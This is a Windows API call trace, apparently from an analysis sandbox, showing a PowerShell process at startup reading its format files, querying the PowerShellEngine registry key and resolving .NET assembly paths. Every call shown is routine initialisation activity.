	[0720.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0720.388] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x15868528, Data2=0x1d7e, Data3=0x4066, Data4=([0]=0xbc, [1]=0xc8, [2]=0x13, [3]=0x38, [4]=0xd1, [5]=0x73, [6]=0xa1, [7]=0x70))) returned 0x0
	[0720.398] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcf527431, Data2=0x3d7, Data3=0x427e, Data4=([0]=0x80, [1]=0xc7, [2]=0x74, [3]=0x2d, [4]=0x38, [5]=0x1f, [6]=0x7e, [7]=0xc5))) returned 0x0
	[0720.400] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0720.401] GetFileType (hFile=0x314) returned 0x1
	[0720.401] SetErrorMode (uMode=0x1) returned 0x1
	[0720.401] GetFileType (hFile=0x314) returned 0x1
	[0720.401] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.402] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.403] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.404] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.404] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0720.405] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0xfb2, lpOverlapped=0x0) returned 1
	[0720.406] ReadFile (in: hFile=0x314, lpBuffer=0x349470a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x349470a*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0720.406] ReadFile (in: hFile=0x314, lpBuffer=0x3494ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x3494ff0*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0720.406] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x314) returned 0x0
	[0720.406] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0720.406] CoTaskMemAlloc (cb=0x5a) returned 0x1b976d60
	[0720.406] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976d60, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0720.406] CoTaskMemFree (pv=0x1b976d60) 
	[0720.406] RegCloseKey (hKey=0x314) returned 0x0
	[0720.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0720.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0720.410] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x49b0e8f4, Data2=0x88e, Data3=0x493f, Data4=([0]=0x88, [1]=0xdd, [2]=0x75, [3]=0xd0, [4]=0x3f, [5]=0x20, [6]=0x9, [7]=0x1f))) returned 0x0
	[0721.856] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xe839e172, Data2=0xe0e2, Data3=0x4713, Data4=([0]=0x99, [1]=0xac, [2]=0xab, [3]=0x0, [4]=0x62, [5]=0x91, [6]=0x59, [7]=0x8b))) returned 0x0
	[0721.857] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x36773509, Data2=0x63c6, Data3=0x4caa, Data4=([0]=0x9a, [1]=0x62, [2]=0x9c, [3]=0x19, [4]=0x41, [5]=0x46, [6]=0xc7, [7]=0xc9))) returned 0x0
	[0721.857] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xdce437c9, Data2=0x8f87, Data3=0x4d5c, Data4=([0]=0x99, [1]=0xd4, [2]=0xb1, [3]=0x71, [4]=0x12, [5]=0x9d, [6]=0x0, [7]=0xfb))) returned 0x0
	[0721.857] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x9650f08a, Data2=0x40f1, Data3=0x4488, Data4=([0]=0xa6, [1]=0x84, [2]=0xef, [3]=0x13, [4]=0xdf, [5]=0x14, [6]=0xb4, [7]=0x81))) returned 0x0
	[0721.858] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcf67b8b5, Data2=0xaeb9, Data3=0x41fb, Data4=([0]=0x93, [1]=0x5a, [2]=0xc4, [3]=0x5a, [4]=0x7a, [5]=0x19, [6]=0xee, [7]=0x24))) returned 0x0
	[0721.858] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0721.858] GetFileType (hFile=0x314) returned 0x1
	[0721.858] SetErrorMode (uMode=0x1) returned 0x1
	[0721.859] GetFileType (hFile=0x314) returned 0x1
	[0721.859] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0721.860] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0721.861] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0721.861] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0721.866] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0721.866] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0721.866] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0xaca, lpOverlapped=0x0) returned 1
	[0721.866] ReadFile (in: hFile=0x314, lpBuffer=0x34e0382, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0382*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0721.866] ReadFile (in: hFile=0x314, lpBuffer=0x34e0d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34e0d50*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0721.867] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x314) returned 0x0
	[0721.867] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0721.867] CoTaskMemAlloc (cb=0x5a) returned 0x1b976d60
	[0721.867] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976d60, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0721.867] CoTaskMemFree (pv=0x1b976d60) 
	[0721.868] RegCloseKey (hKey=0x314) returned 0x0
	[0721.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0721.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0721.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0721.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0723.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0723.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0723.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0723.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0723.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0723.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0723.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0723.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0723.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0723.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0723.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0725.148] VirtualQuery (in: lpAddress=0xebbc0, lpBuffer=0xeca80, dwLength=0x30 | out: lpBuffer=0xeca80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0725.149] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x7bf06fce, Data2=0x8861, Data3=0x4d70, Data4=([0]=0x9d, [1]=0xcc, [2]=0x63, [3]=0xfa, [4]=0xdf, [5]=0x3d, [6]=0xcd, [7]=0x54))) returned 0x0
	[0725.150] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x60977a1, Data2=0x27c3, Data3=0x476e, Data4=([0]=0x86, [1]=0xe9, [2]=0xb9, [3]=0x1, [4]=0xc0, [5]=0x61, [6]=0x66, [7]=0x64))) returned 0x0
	[0725.151] VirtualQuery (in: lpAddress=0xebd70, lpBuffer=0xecc30, dwLength=0x30 | out: lpBuffer=0xecc30*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0725.152] VirtualQuery (in: lpAddress=0xebd70, lpBuffer=0xecc30, dwLength=0x30 | out: lpBuffer=0xecc30*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0725.154] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x422b0962, Data2=0x78f8, Data3=0x4196, Data4=([0]=0xb5, [1]=0x91, [2]=0x7a, [3]=0xc4, [4]=0x71, [5]=0x2f, [6]=0x7d, [7]=0x3f))) returned 0x0
	[0725.158] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x8e1c76ef, Data2=0xb703, Data3=0x4707, Data4=([0]=0xb6, [1]=0xed, [2]=0x13, [3]=0x44, [4]=0xf8, [5]=0x8, [6]=0xf0, [7]=0x39))) returned 0x0
	[0725.168] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcf4c15a, Data2=0xd69a, Data3=0x4d4b, Data4=([0]=0x89, [1]=0xa5, [2]=0xa4, [3]=0x9d, [4]=0x39, [5]=0xf9, [6]=0x10, [7]=0x53))) returned 0x0
	[0725.169] VirtualQuery (in: lpAddress=0xeb630, lpBuffer=0xec4f0, dwLength=0x30 | out: lpBuffer=0xec4f0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0725.170] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x63cfc7cd, Data2=0x3165, Data3=0x4724, Data4=([0]=0xad, [1]=0xf, [2]=0x77, [3]=0x92, [4]=0x9, [5]=0x7b, [6]=0xec, [7]=0xdc))) returned 0x0
	[0725.170] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xbe3a9b1, Data2=0xc53, Data3=0x4baa, Data4=([0]=0xa3, [1]=0x74, [2]=0xe4, [3]=0x89, [4]=0xbb, [5]=0x76, [6]=0x25, [7]=0xfb))) returned 0x0
	[0725.171] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0725.171] GetFileType (hFile=0x2e4) returned 0x1
	[0725.171] SetErrorMode (uMode=0x1) returned 0x1
	[0725.171] GetFileType (hFile=0x2e4) returned 0x1
	[0725.171] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.715] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.715] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.715] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.716] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.716] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.716] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.716] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.718] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.718] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.718] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.719] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.720] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.722] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.722] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0xbce, lpOverlapped=0x0) returned 1
	[0726.723] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c1f5e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c1f5e*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0726.723] ReadFile (in: hFile=0x2e4, lpBuffer=0x33c2828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x33c2828*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0726.723] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x2e4) returned 0x0
	[0726.723] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0726.723] CoTaskMemAlloc (cb=0x5a) returned 0x1b976350
	[0726.723] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976350, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0726.724] CoTaskMemFree (pv=0x1b976350) 
	[0726.724] RegCloseKey (hKey=0x2e4) returned 0x0
